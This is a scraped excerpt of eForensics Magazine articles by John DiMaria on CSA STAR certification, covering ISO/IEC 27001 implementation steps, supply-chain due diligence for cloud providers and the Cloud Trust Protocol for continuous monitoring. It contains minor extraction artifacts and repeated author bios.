Do all of the above while recognizing the dynamic and fast-changing world that is cloud

CERTIFICATION PROVIDES THE ULTIMATE BUSINESS OBJECTIVES







To improve customer trust in cloud services


To improve security of cloud services
To increase the efficiency of cloud service procurement
To make it easier for cloud providers and customers to achieve compliance
To provide greater transparency to customers about provider security practices
To achieve all the above objectives as cost-effectively as possible

CSA STAR PROVIDES ASSURANCE TO CLIENTS


ISO 27001 requires the organization to evaluate customers requirements, expectations, and contractual constraints. It necessitates the organization to implement a system to achieve this
ISO 27001 requires the organization to conduct a risk analysis that identifies the risks to meeting
customers expectations
The Cloud Controls Matrix (CCM) requires the organization to address specific issues that are critical to cloud security
The maturity model assesses how well activities are managed in the control areas

57

www.eForensicsMag.com

THE JOURNEY TO CSA STAR CERTIFICATION IMPLEMENTATION CONSIDERATIONS


AND ROAD MAP
The desire to increase transparency, create competitive advantage and customer demand are two of
the primary reasons companies pursue STAR Certification.

A GAP ANALYSIS OF THE INFORMATION SECURITY MANAGEMENT SYSTEM IS


REQUIRED AND SHOULD INCLUDE









Security policy
Organizational security
Asset classification and control
Personnel security
Physical and environmental security
Communications and operations management
Access control
System development and maintenance
Business continuity management
Compliance

PLANNING FOR CSA STAR CERTIFICATION

Figure 4. CSA STAR Certification Formula

PLANNING

A management system will need to be built on ISO/IEC 27001 sections 4 10 plus address applicable
ISO/IEC 27001 Annex A + CCM Controls and any other internal or regulatory requirements. At minimum,
the 10 sections mentioned in the gap analysis above will need to be covered.
As background, ISO/IEC 27001 is a management systems standard with seven core processes (Figure
6). It outlines the processes and procedures an organization must have in place to manage information
security issues in core areas of the business. It does not stipulate exactly how the process should operate, allowing for flexibility so an organization can be run as business requirements dictate.

Figure 5. Core Processes


58

www.eForensicsMag.com

IMPLEMENTATION

PROJECT PLAN

In the implementation phase, a defined project plan needs to be defined and followed. As Figure 7 indicates, the plan has 4 stages and 18 defined steps.

Figure 6. Planning Route Best Practice

STAGE 1: COMMITMENT TO IMPLEMENT

Identify the organizational goals and objectives. Build a team and assign a leader who has direct access
to top management.

59

www.eForensicsMag.com

Figure 7. Commitment to Implement

STAGE 2: STATUS UPDATE

Training Needs Analysis At this point it is important to consider what training will be required. Team
members need the proper skills to ensure successful implementation.
Perform a Gap Analysis It is vital to understand various aspects of the organization in order to know
exactly what needs to be achieved to meet the requirements of certification. Mapping a course for a project without having the proper information is like driving to a new location without any guidance to reaching
the destination. Failure to understand where the gaps lie will cause cost overruns and wasted resources.
Implementation Project Plan Preparation With the information provided by the Gap Analysis, developing a well-informed project plan is like mapping out a long journey; the destination, timeframe and best
route to take as well as the milestones that need to be reached along the way are all required. Resources
and responsibilities for each task will need to be outlined to instill process ownership. In the event of unforeseen disruptions, the implementation plan will allow for adjustments and adaptations to stay on track.

60

www.eForensicsMag.com

Figure 8. Example Project Plan Structure

Estimate Costs The budget is very critical as every step and control is a cost, so it is important to periodically review and justify the plans requirements. Subsequent audits also require adequate data and
documentation regarding the controls established.

Figure 9. Stage II
61

www.eForensicsMag.com

STAGE 3: IMPLEMENT AND OPERATE

Support the Project With the plan and budget in place, it is time to put the plan into action. Hands-on
top management commitment is a requirement as is authorizing each process owner to carry out their
tasks to keep them accountable.
Monitor the Project Continuous monitoring of the project is critical. This is also the stage where internal audits begin. Metrics and key process indicators are established to test the management system
and to ensure the metrics and objectives are adequately aligned, and make any necessary adjustments.
The metrics also monitor maturity and drive continual improvement by constantly monitoring the inputs
and outputs of the organization.

Figure 10. Implement and Operate

STAGE 4 MONITOR, MEASURE AND REVIEW

Management review During and after implementation, top management needs to review the organizations information security management system (ISMS) at planned intervals to ensure its continuing suitability, adequacy and effectiveness. This also is an indicator of top management involvement.
The management review should include consideration of:
a) the status of actions from previous management reviews
b) changes in external and internal issues that are relevant to the ISMS
c) feedback on the information security performance, including trends from metrics and audit results
Prepare for Certification This is the point where preparation for the CSA STAR certification audit starts.
All the sections of ISO/IEC 27001 should be addressed. The Statement of Applicability (Figure 12) indicating what controls are in place including the cloud specific controls in the CCM, explanation of those
controls and justifications for any exclusions as well.

62

www.eForensicsMag.com

Figure 11. Stage 4

Figure 12. SOA

63

www.eForensicsMag.com

The key factors related to STAR Certification that must be part of the overall ISO/IEC 27001 system
are as follows:
Evaluate the efficiency of an organizations ISMS and ensure the scope, processes and objectives
are Fit for Purpose (particularly suitable; fitting; compatible)
Help the organization prioritize areas for improvement and lead them towards business excellence
Enable effective comparison across other organizations in the applicable sector
Enable the auditor to assess a companys performance, on long-term sustainability and risks, in addition to ensuring they are Service Level Agreement (SLA) driven
With implementation complete, it is best practice to monitor the system for a specified period of time
depending on the size and complexity of the organization to ensure the system is flowing as expected.
Attention needs to be directed to confirm that key metrics are being monitored and providing the data required and at least one management review has been held and documented, and the system has been
validated as effective.

LESSONS LEARNED

There are a number of areas where lessons can be learned from organizations who initially had difficulty
with certification.
Lack of Commitment Make sure a good business case has been built and management is committed
to the project. Without it, not only will it make implementation a challenge, but the system will not be in
compliance with the standard.
Time and Resources These are the two most valuable things in any organization. Management commitment and good planning will ensure there are plenty of both.
Scope and boundaries creep Dont Boil the Ocean. Theres an old joke How do you eat an elephant? A: One bite at a time. This is true for implementation. Start small, get some quick wins and
expand the scope over time. Unless it is a very small company, trying to certify the entire organization at
one time will be a lesson in futility.
Training and awareness This can have the greatest impact to your process. Proven to be one of the
lowest cost but most effective moves to make, training and awareness can have the greatest impact on
process development. Investment to upgrade an organizations talent is never a waste.
Project Management The need of good project management cannot be overstated. Keeping everyone focused and on track will ensure targets and objectives are met within the appropriate timeframe.

THE CERTIFICATION PROCESS

Certification acts as a screening process to all cloud procurement people and brings the accountability
and transparency that is necessary to build trust in the cloud. Below are the next steps and a high-level
view of the certification process.







Obtain quotation and submit application


Auditor is appointed
System reviewed to ensure standard requirements addressed and registration assessment planned
Initial assessment conducted
Conformity and effectiveness of system to standard assessed plus maturity evaluation
Corrective action plan (if required) submitted
Registration confirmed
Certificate issued ISO 27001 + CSA STAR with Maturity Rating Information added to CSA
STAR Registry
Continuous assessment program (3 year cycle)

64

www.eForensicsMag.com

Figure 13. Certification Steps

CONCLUSION

In summary, there are several key steps that will ensure implementation success. Once achieved, there
are vast advantages and benefits to certification.
Implementation key steps
Obtain commitment and support from senior management
Engage the whole business with good internal communication
Establish a competent and knowledgeable implementation team to deliver best results, sharing roles
and responsibilities
Download the CCM from the CSA
Compare existing systems and processes with the requirements of the CCM. Get feedback from
customers on current processes and service
Make sure the scope is aligned with customer-critical processes and implement all relevant controls
Benchmark current capability against the maturity model and identify opportunities to improve
Clearly lay out a well-communicated plan of activities and timescales. Make sure roles are understood
Train staff to carry out internal audits
Regularly review controls to make sure they remain appropriate, effective and deliver continual improvement
The Cloud Control Matrix (CCM) and ISO/IEC 27001 advantages
Mapped against all the other relevant standards: ISO 27001, COBIT, HIPAA, NIST SP800-53, FedRamp, PCI, BITS, GAPP, Jericho Forum, NERC CIP, ENISA IAF, etc
Written with the intention to make it publically available.
Updated to keep pace with changes.
Drives continuous improvement
How it provides assurance to your clients
ISO 27001 requires the organization to evaluate their customers requirements, expectations, and
contractual constraints. It requires that a system has been implemented to achieve this
ISO 27001 requires the organization has conducted a risk analysis that identifies the risks to meeting their customers expectations
The CCM requires the organization to address specific issues that are critical to cloud security
The maturity model assesses how well are managed in the control areas.

65

www.eForensicsMag.com

Sales and Marketing Benefits:


Added to the current management system
An ISO/IEC 27001 certification plus a STAR certificate are evidence of both compliance and performance to suppliers, customers, and other interested parties
The ability to benchmark an organizations performance and gauge improvement from year to year
An independently validated report from an external Certified Body (CB) body which can be used to
demonstrate an organizations progress & performance levels
Exclusive to the STAR Registry
Meets G-Cloud requirements (Mark Dunne, Cloud Security Alliance and Government Cloud eForensics Magazine ISG issue 04, (Feb 2014):p 2.)
Strategic Benefits:
A 360 enhanced assessment giving senior management full visibility to evaluate the effectiveness of
both their management system and the roles and responsibilities of personnel within the organization.
A flexible assessment that can be tailored through the Statement of Applicability. This guarantees
the results and measurements of assessments are both relevant and necessary in helping organizations manage their business.
A comprehensive business report that goes beyond a usual assessment report and gives a strategic
and accurate overview of an organizations performance enabling senior management to identify action areas needed.
A set of improvement targets to encourage an organization to move beyond compliance toward continual improvement.
Operational Benefits
Scalable to organizations of all sizes. Provides information that allows an understanding of where
the organization is now and measure any improvements, internally benchmark sites, and potentially
benchmark the external supply chain to stimulate healthy competition.
A visual representation of the status of a business that instantly highlights strengths and weaknesses, allowing clients to maximize resources, improve operational efficiencies and reduce costs.
Independent reassurance to prove to senior management where the risks, threats, and opportunities
lie within a business.
ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Associations Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuitys new standard bearer) and featured on the cover of PENTEST Magazine.
66

www.eForensicsMag.com

EFORENSICS CSA STAR CERTIFICATION

SUPPLY CHAIN
MANAGEMENT
USING CSA STAR
CERTIFICATION

by John DiMaria

When an organization adopts cloud services, it is in fact


expanding its operations from a local or regional presence to a
more global one. As a result, the corresponding organizational
operations strategy needs to be adjusted to align with these
changes. A more formal analysis of the supply-chain as part of
a more comprehensive due diligence review also needs to be
considered (By definition, the Cloud Controls Matrix (CCM) is a
baseline set of security controls created by the Cloud Security
Alliance to help enterprises assess the risk associated with a
cloud computing provider).

ast year, the Cloud Security Alliance (CSA) published a report entitled,
The Notorious Nine outlining the top threats in cloud security. (Top
Threats Working Group, 2013) Not surprisingly, Insufficient Due Diligence made the list. The report points out that organizations are rushing to
the cloud without a complete understanding of the cloud service providers
(CSP) environment, applications or even the various services which are being pushed to the cloud. It is also not always clear how the CSP handles incidents, encryption, and security monitoring. Organizations are rarely aware
of all the risks they take when working with a CSP. In fact, the risks are multifaceted and are far more complex than those they experienced before moving to the cloud.

67

www.eForensicsMag.com

CSA went on to point out that an organization that rushes to adopt cloud services may subject itself to
a number of issues, including:



Contractual issues over obligations regarding liability, response, and/or transparency


Mismatched expectations between the CSP and the customer
Lack of internal training and awareness within the user organization
Potential for software designers/engineers that are developing software to be unaware of associated risks

Many organizations are turning to the cloud because of the resources required to manage complex supply chains. It can be challenging for most organizations to understand the supply-chain structure of the
CSPs environment; however, an increase in transparency will increase trust.
As pointed out in the 2013 PWC and the MIT Forum for SupplyChain Innovation, The size of the supply chain network has increased, dependencies between entities and between functions have shifted,
the speed of change has accelerated and the level of transparency has decreased. (PwC and the MIT
Forum for Supply Chain Innovation, 2013) This is certainly a call to action and STAR Certification can
serve as that screening process that will allow cloud users to have the transparency required to make
informed decisions and increase trust.
STAR Certification serves the supply-chain well for both users and providers by:





Improving customer trust in cloud services


Enhancing security of cloud services
Increasing the efficiency of cloud service procurement
Making it easier for cloud providers and customers to show compliance
Providing greater transparency to customers about provider security practices
Achieving these objectives as cost-effectively as possible

By requiring STAR Certification down the supply-chain, and in particular to tier one and tier two suppliers,
the following will be recognized and addressed:




A globally relevant certification to reduce duplication of efforts is provided


Localized, national, state, and regional compliance needs are met
Industry specific requirements are managed
Different assurance requirements are controlled
Certification staleness is prevented and assurance provider remains secure after point in time
certification
Service is user-centric, voluntary, and business driven
Global standards/schemes are leveraged
The CSA STAR Registry serves as a depository for organizations at all levels of transparency, i.e., selfassessment or certification, allowing the user to know the scope covered and whether the organization
is certified.
In certifying to CSA STAR the supplier complies with the most rigorous scheme ever developed for
cloud security, based on the most globally accepted information security standard, ISO/IEC ISO 27001.
The CSPs are monitored to ensure their systems mature and grow through a measurement of how well
the processes are managed and how they improve over time.

68

www.eForensicsMag.com

Figure 1. Example Process Maturity Report

It is critical that businesses and other organizations that depend on cloud services adopt a similar approach in evaluating those services and demand the highest level of transparency available. The harm
that potential disruptions or breaches pose to daily operations must be equaled by the allocation of sufficient resources to assess threats, take preventive measures, and mitigate damage that results from any
incidents that occur. Failure to work with suppliers to mitigate threats and prepare an effective response
can lead to huge financial losses, irreparable damage to the organization, or even its untimely demise.
In module 4, we will reveal the next step in improving transparency and trust in the cloudcontinuous
monitoring.
BIBLIOGRAPHY

PwC and the MIT Forum for Supply Chain Innovation. (2013). Making the Right Risk Decisions to Strengthen Operations Performance. PwC.
Top Threats Working Group. (2013). The Notorious Nine Cloud Computing Top Threats in 2013. Cloud Security Alliance.

ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Associations Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuitys new standard bearer) and featured on the cover of PENTEST Magazine.

69

www.eForensicsMag.com

CONTINUOUS
MONITORING
CONTINUOUS AUDITING/ASSESSMENT OF RELEVANT
SECURITY PROPERTIES
by John DiMaria

While the Cloud Security Alliances (CSA) STAR Certification has


certainly raised the bar for cloud providers, any audit is still
a snapshot of a point in time. What goes on between audits
can still be a blind spot. To provide greater visibility, the CSA
developed the Cloud Trust Protocol (CTP), an industry initiative
which will enable real time monitoring of a CSPs security
properties, as well as providing continuous transparency of
services and comparability between services on core security
properties (Source: CSA CTP Working Group Charter).

What you will learn:


In the last 3 modules we covered
STAR Certification and the increased
transparency created by the expanded scope, Cloud Control Matrix
(CCM), and maturity model. STAR
Certification raises the level of trust
users have in cloud service providers (CSP). This module is a look into
the future.

his process is now being further developed by BSI and other industry leaders. CTP forms part of the Governance, Risk, and Compliance
stack and the Open Certification Framework as the continuous monitoring component, complementing point-in-time assessments provided by STAR
certification and STAR attestation. CTP is a common technique and nomenclature to request and receive evidence and affirmation of current cloud service operating circumstances from CSPs.

CONTINUOUS MONITORING: THE CONCEPT

According to the current CTP guidelines, in order to be of maximum benefit,


there must be a meaningful comparison between products and accurate data
reporting the state of the system being measured. Therefore security attributes and their metrics must be:
Well defined the parameter definition is not ambiguous. Suppliers must
not be able to interpret measures differently which would allow them to
game the market by applying more generous interpretations and therefore reduce comparability and degrade consumer trust.
Determinate multiple measurements of identical systems in identical
states must give the same result. For example, measurements which result in random results are of no value.

70

www.eForensicsMag.com

Correlated customer utility attribute metrics must be strongly correlated with perceived value to
consumers. For example, clock speed for CPUs is not a useful measure unless it is correlated to real world performance on typical consumer tasks.
Comparable the parameter must reflect the same quantity across different measurement targets.
For example, if the scope of measurement is not well defined,one cloud provider may report the
availability of the coffee machine in its data center, while another might report the availability of its
web services. In this case, the measurements are not comparable.
Standardized the same exact term and definition are used across different contexts. If suppliers
report product features according to different terms, results are not comparable.

Figure 1. CSA GRC Stack Model (The GRC Stack (V2.0) Understanding and applying the CSA GRC stack for payoffs and protection.
Cloud Security Alliance. https://csa.org wp-content/uploads/2011/11/GRC_STACK_PPT_FINAL.pptx accessed August 1, 2014)

The main goal of the CTP is to allow cloud clients to make queries about critical security attributes in
the cloud. It is expected that continuous monitoring will be an extension of the CSA STAR Certification
process and attributes will be validated and certified as part of the STAR Certification scheme.
BSI has taken a leadership role by Co-Chairing the CTP Working Group. As the original developers of
information security standards and one of the co-founders of ISO, we volunteer our expertise in the spirit
of technological and process advancement.
CSA STAR Continuous is currently under development and the target date of delivery is 2015.
Please monitor the CSA Website: https://cloudsecurityalliance.org/star/ for the latest developments
and contact BSI at Inquiry.msamericas@bsigroup.com with questions.
ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Associations Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuitys new standard bearer) and featured on the cover of PENTEST Magazine.
71

www.eForensicsMag.com

Vous aimerez peut-être aussi